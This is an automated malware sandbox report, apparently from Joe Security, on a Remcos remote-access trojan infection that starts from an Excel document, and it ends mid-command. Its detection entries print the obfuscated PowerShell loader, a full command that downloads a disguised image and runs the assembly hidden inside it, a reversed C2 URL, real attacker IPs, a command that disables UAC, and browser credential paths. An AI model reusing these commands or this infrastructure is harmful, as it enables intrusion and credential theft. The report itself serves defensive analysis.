              13.2.powershell.exe.43deb20.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                13.2.powershell.exe.43deb20.1.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6aab8:$a1: Remcos restarted by watchdog!
                • 0x8c0d8:$a1: Remcos restarted by watchdog!
                • 0x6b030:$a3: %02i:%02i:%02i:%03i
                • 0x8c650:$a3: %02i:%02i:%02i:%03i
                13.2.powershell.exe.43deb20.1.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x8612c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x860a8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x860a8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x865a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x86dd8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64b7c:$str_b2: Executing file:
                • 0x8619c:$str_b2: Executing file:
                • 0x65bfc:$str_b3: GetDirectListeningPort
                • 0x8721c:$str_b3: GetDirectListeningPort
                • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x86bc8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x65728:$str_b7: \update.vbs
                • 0x86d48:$str_b7: \update.vbs
                • 0x64ba4:$str_b9: Downloaded file:
                • 0x861c4:$str_b9: Downloaded file:
                • 0x64b90:$str_b10: Downloading file:
                Click to see the 19 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 137.184.234.91, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49174, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 137.184.234.91, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , ProcessId: 3180, ProcessName: wscript.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , ProcessId: 3180, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 45.83.105.92, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3008, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk", ProcessId: 3412, ProcessName: RegAsm.exe
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3512, Protocol: tcp, SourceIp: 45.83.105.92, SourceIsIpv6: false, SourcePort: 443
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += 